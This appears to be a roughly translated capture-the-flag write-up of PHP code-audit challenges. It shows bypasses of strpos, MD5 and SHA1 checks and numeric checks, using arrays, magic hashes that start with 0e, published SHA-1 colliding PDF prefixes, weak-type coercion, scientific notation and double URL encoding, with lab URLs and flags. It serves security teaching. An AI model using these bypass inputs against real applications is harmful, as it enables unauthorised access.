Table of contents
Question 5 (scientific notation)
Code audit
Question 1 (String Bypass)
Analysis: Check whether it is a string, it is a string, die; check whether it containshehehehehahaha, if yes, die
Solution:
How to bypass Strpos()?
Array bypass, we enter
http://10.81.8.126/code/1.php?s[]=hehehehehahaha
flag{c2735cdb-67f3-479d-bf0f-b5a31b2c1a0a}
Question 2 (MD5 bypass)
Sah1() function, hash
method 1
It should be the same as the MD5 function, because the string is passed in, and the hash starting with 0e is found.
Principle: PHP is a weakly typed language. Even if the input is a string, starting with 0e7889 means it becomes a number, which is scientific notation 1*10 raised to the power of 7889.
Md5:
240610708:0e462097431906509019562988736854
QLTHNDT:0e405967825401955372549139051580
QNKCDZO:0e830400451993494058024219903391
PJNPDWY:0e291529052894702774557631701704
NWWKITQ:0e763082070976038347657360817689
NOOPCJF:0e818888003657176127862245791911
MMHUWUV:0e701732711630150438129209816536
MAUXXQC:0e478478466848439040434801845361
Eleven:
10932435112: 0e07766915004133176347055865026311692244
aaroZmOk: 0e66507019969427134894567494305185566735
aaK1STfY: 0e76658526655756207688271159624026011393
aaO8zKZF: 0e89257456677279068558073954252716165668
aa3OFF9m: 0e36977786278517984959260394024281014729
0e1290633704: 0e19985187802402577070739524195726831799
no
?username=aaroZmOk&password=aaK1STfY
why not?
Because it is all equal to ===, it is no longer equal to the number 0 after encryption, but a string comparison is performed.
I searched online and found two values that collided with the same sha1 but different source codes.
a=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01%7FF%DC%93%A6%B6%7E%01%3B%02%9A%AA%1D%B2V%0BE%CAg%D6%88%C7%F8K%8CLy%1F%E0%2B%3D%F6%14%F8m%B1i%09%01%C5kE%C1S%0A%FE%DF%B7%608%E9rr/%E7%ADr%8F%0EI%04%E0F%C20W%0F%E9%D4%13%98%AB%E1.%F5%BC%94%2B%E35B%A4%80-%98%B5%D7%0F%2A3.%C3%7F%AC5%14%E7M%DC%0F%2C%C1%A8t%CD%0Cx0Z%21Vda0%97%89%60k%D0%BF%3F%98%CD%A8%04F%29%A1
b=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01sF%DC%91f%B6%7E%11%8F%02%9A%B6%21%B2V%0F%F9%CAg%CC%A8%C7%F8%5B%A8Ly%03%0C%2B%3D%E2%18%F8m%B3%A9%09%01%D5%DFE%C1O%26%FE%DF%B3%DC8%E9j%C2/%E7%BDr%8F%0EE%BC%E0F%D2%3CW%0F%EB%14%13%98%BBU.%F5%A0%A8%2B%E31%FE%A4%807%B8%B5%D7%1F%0E3.%DF%93%AC5%00%EBM%DC%0D%EC%C1%A8dy%0Cx%2Cv%21V%60%DD0%97%91%D0k%D0%AF%3F%98%CD%A4%BCF%29%B1
Method 2
Array bypass
Like the MD5 function, Sha1() does not recognize arrays and returns NULL
test
As for why password[1], because there is a judgment condition that requires username!=password
Question 3
I test the code
Let’s take a closer look at our parameters
If we write like this
Why do we need to write 11 times? In addition to the index problem, there is also the fact that its assignment is an assignment without an index. This requires us to loop 11 times, and our 11th index is 10, and the value must be hacker!
But why is this possible?0&1&2&3&4&5&6&7&8&9&10=hacker!
In fact, you can enter anything, as long as there are 11 parameters, because the index starts from 0
In other words, you can also enter ?1&1&1&1&1&1&1&1&1&1&10=hacker!
Even ?A&B&C&D&E&F&G&H&I&J&Q=hacker!
The teacher said that as long as it loops 11 times, his 11th index will be 10
Answer: flag{c2735cdb-67f3-479d-bf0f-b5a31b2c1a0a}
Question 4
Analysis: Determine whether it is a number, if so, die; judge whether it is greater than 996, if it is greater, there will be a flag.
method 1
Try array skipping?
success
When I analyze the array, I can skip the first judgment. Let’s try the second judgment by ourselves.
Empty is fine too
feasible
Method 2
Weak type coercion skip
Principle: String'997a'==>Number 997
Question 5 (scientific notation)
analyze:
Match, must contain 1 or more [A-Za-z0-9], the length cannot be less than 8, and the size cannot be greater than 8 9s
Solution:
Try an array, but it doesn't work. The array can't be matched directly. Another way to think about hexadecimal is to add 0x. 100 million is 0x575360400, but it doesn't work. Change again, weak type conversion, eh~ it won’t work either
Scientific notation 1e8 is skipped. Note that it is 1——e——8, not Io l, it is 1 of 123.
?check=1e8
1e8=1*10^8=100 million
flag{c2735cdb-67f3-479d-bf0f-b5a31b2c1a0a}
Question 6 (encoding bypass)
analyze:
Encoding password bypasses strpos(), encoding bypasses
Encode the URL once, because there will be decoding later
try
First encode in hexadecimal and add %
61 64 6d 69 6e 31 32 33 31 32 33 31 32 33
%61%64%6d%69%6e%31%32%33%31%32%33%31%32%33
But why is it OK to encode twice, but not encode it?